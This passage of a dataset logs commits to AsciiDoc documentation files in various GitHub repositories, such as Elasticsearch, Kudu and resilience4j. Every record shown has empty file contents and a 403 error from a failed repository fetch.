READMY.adoc","repos":"DmitryKubahov\/VESB","old_file":"collections\/READMY.adoc","new_file":"collections\/READMY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DmitryKubahov\/VESB.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e46e5e9ae65fec62494eaf45ffa07d8fe7f0216f","subject":"Blog: Hawkular Alerting Tutorial announcement (#285)","message":"Blog: Hawkular Alerting Tutorial announcement 
(#285)\n\n","repos":"hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/03\/14\/hawkular-alerting-tutorial.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/03\/14\/hawkular-alerting-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01206eb0167f7737de325c7c246162f3b5344acc","subject":"Fixed typo (cherry picked from commit 52e3d0bab1c09f428398ba3e04213289dca3bbeb)","message":"Fixed typo\n(cherry picked from commit 52e3d0bab1c09f428398ba3e04213289dca3bbeb)\n","repos":"takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecb0b4377e25f1f0ec0d611a4adac80ff8cc9dfd","subject":"Updated INSTALLATION.adoc: Fix the link to README.md \/ Customizing Paths","message":"Updated INSTALLATION.adoc: Fix the link to README.md \/ Customizing Paths\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INSTALLATION.adoc","new_file":"doc\/INSTALLATION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0119daabff58dc62a33173290aa50d68cec8095","subject":"Import release notes for Groovy 2.3","message":"Import release notes for Groovy 2.3\n","repos":"sdkman\/sdkman-website,webkaz\/groovy-website,benignbala\/groovy-website,marc0der\/groovy-website,dmesu\/sdkman-website,m-ullrich\/groovy-website,sdkman\/sdkman-website,kevintanhongann\/groovy-website,kevintanhongann\/groovy-website,groovy\/groovy-website,rahulsom\/sdkman-website,marcoVermeulen\/groovy-website,rahulsom\/sdkman-website,marc0der\/groovy-website,webkaz\/groovy-website,dmesu\/sdkman-website,benignbala\/groovy-website,marcoVermeulen\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.3.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmesu\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"febb4bf7bc8f7fafcd94b893eb2ad0fe4b7d8648","subject":"Update removal_of_types.asciidoc","message":"Update removal_of_types.asciidoc\n\nFixed `include_in_type` -> `include_type_name`","repos":"sneivandt\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,mjason3\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,strapdata\/elassandra,uschindler\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,wangtuo\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,
mjason3\/elasticsearch,fred84\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,robin13\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch","old_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5cf56a846aade1a1843bac86cfc85f3094c1d3d7","subject":"docs: Remove incorrect warning","message":"docs: Remove incorrect warning\n\nCloses #25935\n","repos":"uschindler\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch
,qwerty4030\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch","old_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91d376f4cf04ec7806da2a51da1f65f82f21a5fb","subject":"Update footer.adoc to include a link to github","message":"Update footer.adoc to include a link to github\n","repos":"rumpelsepp\/snap","old_file":"man\/footer.adoc","new_file":"man\/footer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/snap.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a1adf411363378ec5bfc187bcd9dde2bee3cf20","subject":"Name and access resources","message":"Name and access resources\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Resources.adoc","new_file":"Best practices\/Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e9fd8c155e895af0c652267575c88b55172ce9e","subject":"Add a few more release notes for 0.9.0","message":"Add a few more release notes for 0.9.0\n\nChange-Id: Ibbd66838b51e467d4c4808fa09972d0cba717143\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3273\nTested-by: Kudu Jenkins\nReviewed-by: Misty Stanley-Jones 
<b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b398826883ed3ae02a65cf265f5e217a3039db4","subject":"Update 2015-11-12-Da-Dom.adoc","message":"Update 2015-11-12-Da-Dom.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-12-Da-Dom.adoc","new_file":"_posts\/2015-11-12-Da-Dom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a48551028b5cee88151cdc1ef6faa457c14061f4","subject":"Updated tutorial: Use Grid::setColumns and Binder (#8698)","message":"Updated tutorial: Use Grid::setColumns and Binder (#8698)\n\n* Updated tutorial: Use Grid::setColumns\n\n* Updated tutorial: use Binder instead of BeanBinder\n","repos":"Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,asashour\/framework,peterl1084\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,kironapublic\/vaadin,mstahv\/framework,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,peterl1084\/framework,kironapublic\/vaadin,asashour\/framework,peterl1084\/framework","old_file":"documentation\/tutorial.adoc","new_file":"documentation\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8edc6598b12a9e191bf2aa3d451dd3cdcaf702a","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"209b52527c3367e6536480e2b5ea083c2b2dfdb2","subject":"Update 2015-02-17-The-start-of-2015.adoc","message":"Update 2015-02-17-The-start-of-2015.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-17-The-start-of-2015.adoc","new_file":"_posts\/2015-02-17-The-start-of-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9109696382aa758c1e7798ec597cd7bed9fad761","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"830aca6af6eceab9d8296b99383f4b00d4ff6b6e","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b8fdba91017517909b4007fc8b14c6e043b7370","subject":"Publish 2096-1-1-Puzzle-5-Admission-e-ticket.adoc","message":"Publish 2096-1-1-Puzzle-5-Admission-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_file":"2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a3e3262a01fe39262d7f6481cf4dd8d3bb513bf","subject":"changed usage styling in readme","message":"changed usage styling in readme\n","repos":"soosc\/metalsmith-publishon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soosc\/metalsmith-publishon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67958bfb33910025bbaf6c54f7663c53b00b5607","subject":"More polish","message":"More polish\n","repos":"wangcan2014\/tut-bookmarks,Sheparzo\/tut-bookmarks,razordaze\/tut-bookmarks,DongsunPark\/bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"c8f1727374011be309e982fc4757db34be2fb2ea","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile URL.\n","repos":"bkuhlmann\/git-cop,bkuhlmann\/git-cop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/git-cop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3ec4b942f2fe06da878d66ac9e6e17c644ad56f","subject":"Python note: Calling easy_install as module","message":"Python note: Calling easy_install as module\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c6596e5d6d59c3896d6dd080b76f4d89c5ba2647","subject":"Updated documentation","message":"Updated documentation\n","repos":"RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e28a10a2dbeb1a1b7d8d7b0441147ca7c6b3d5a2","subject":"Updated README","message":"Updated README\n","repos":"resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1465e65ffe7d6d47bfabb9ea773b68c915cb807b","subject":"Update README.doc with correct endpoints","message":"Update README.doc with correct endpoints\n","repos":"lucasponce\/hawkular-alerts,tsegismont\/hawkular-alerts,lucasponce\/hawkular-alerts,hawkular\/hawkular-alerts,jshaughn\/hawkular-alerts,tsegismont\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,jshaughn\/hawkular-alerts,lucasponce\/hawkular-alerts,jsanda\/hawkular-alerts,jsanda\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasponce\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c19f496ebc45d9c8ef2c3e2bd0dce52ab76db80","subject":"gardeing","message":"gardeing\n","repos":"Kronos-Integration\/kronos-service-manager","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/Kronos-Integration\/kronos-service-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"47546f6d0c56da7ed642afe52c1b46e6848e4970","subject":"Fix formatting","message":"Fix formatting\n\nSome of the text in the \"Using Git\" section was misformatted because of incorrect use of quotes.","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"14e7cbe05d5453c3c9bb5fdc78d7558fee6df011","subject":"Added license headers","message":"Added license headers\n","repos":"mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1e7cc7d255c4c3640f01450c60ad25f8fd1b93a","subject":"Update Readme, parametrize more strings, remove redundant stuff","message":"Update Readme, parametrize more strings, remove redundant stuff\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35244e57d5e4ee3caa314d5ef22e92f445910b99","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15eb0957ef2550be377b9425476ea0041351989d","subject":"Add a README with some basic information.","message":"Add a README with some basic information.\n","repos":"jamezp\/wildfly-arquillian","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jamezp\/wildfly-arquillian.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f263ceed153137e9377a514adb0afb8c97b00be8","subject":"Fixes in Readme","message":"Fixes in Readme\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7be61255129d3d1d729df91c8bd6055eab0ee9be","subject":"README: add WP:RFC link","message":"README: add WP:RFC 
